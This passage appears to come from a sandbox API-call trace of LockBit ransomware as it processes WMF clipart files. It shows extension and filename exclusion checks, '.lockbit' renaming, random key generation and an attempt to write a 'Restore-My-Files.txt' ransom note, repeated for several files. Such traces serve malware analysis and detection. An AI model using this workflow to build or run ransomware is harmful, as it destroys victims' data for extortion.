lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.372] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.373] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.373] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01777_.WMF") returned -1 [0176.374] lstrcmpiW (lpString1="ntldr", lpString2="SO01777_.WMF") returned -1 [0176.374] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01777_.WMF") returned -1 [0176.374] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01777_.WMF") returned -1 [0176.374] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01777_.WMF") returned -1 [0176.374] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01777_.WMF") returned 1 [0176.374] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01777_.WMF") returned -1 [0176.374] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.374] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF") returned=".WMF" [0176.374] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.374] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.374] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.375] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.376] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF.lockbit") returned 72 [0176.376] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01777_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0176.377] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.377] malloc (_Size=0x40068) returned 0x3ef0008 [0176.377] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9574) returned 1 [0176.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0176.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0176.379] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.386] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.386] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.387] free (_Block=0x1fa2ed8) [0176.387] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.387] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.387] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.387] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01785_.WMF", cAlternateFileName="")) returned 1 [0176.387] lstrcmpiW (lpString1=".", lpString2="SO01785_.WMF") returned -1 [0176.388] lstrcmpiW (lpString1="..", lpString2="SO01785_.WMF") returned -1 [0176.388] PathFindExtensionW (pszPath="SO01785_.WMF") returned=".WMF" [0176.388] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.388] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.389] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.389] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01785_.WMF") returned -1 [0176.390] lstrcmpiW (lpString1="ntldr", lpString2="SO01785_.WMF") returned -1 [0176.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01785_.WMF") returned -1 [0176.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01785_.WMF") returned -1 [0176.390] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01785_.WMF") returned -1 [0176.390] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01785_.WMF") returned 1 [0176.390] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01785_.WMF") returned -1 [0176.390] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.390] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF") returned=".WMF" [0176.390] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.390] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.390] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.391] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.391] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF.lockbit") returned 72 [0176.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01785_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0176.392] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.393] malloc (_Size=0x40068) returned 0x3d70450 [0176.393] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=27816) returned 1 [0176.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.393] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0176.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0176.394] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.398] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.398] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.400] free (_Block=0x1fa2ed8) [0176.400] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.400] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.400] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.400] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8632900, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb8632900, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x1088, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01805_.WMF", cAlternateFileName="")) returned 1 [0176.400] lstrcmpiW (lpString1=".", lpString2="SO01805_.WMF") returned -1 [0176.400] lstrcmpiW (lpString1="..", lpString2="SO01805_.WMF") returned -1 [0176.400] PathFindExtensionW (pszPath="SO01805_.WMF") returned=".WMF" [0176.400] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.400] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.401] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.402] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.402] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01805_.WMF") returned -1 [0176.403] lstrcmpiW (lpString1="ntldr", lpString2="SO01805_.WMF") returned -1 [0176.403] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01805_.WMF") returned -1 [0176.403] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01805_.WMF") returned -1 [0176.403] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01805_.WMF") returned -1 [0176.403] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01805_.WMF") returned 1 [0176.403] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01805_.WMF") returned -1 [0176.403] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.403] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF") returned=".WMF" [0176.403] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.403] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.403] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.404] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.404] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF.lockbit") returned 72 [0176.404] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01805_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.406] CreateIoCompletionPort 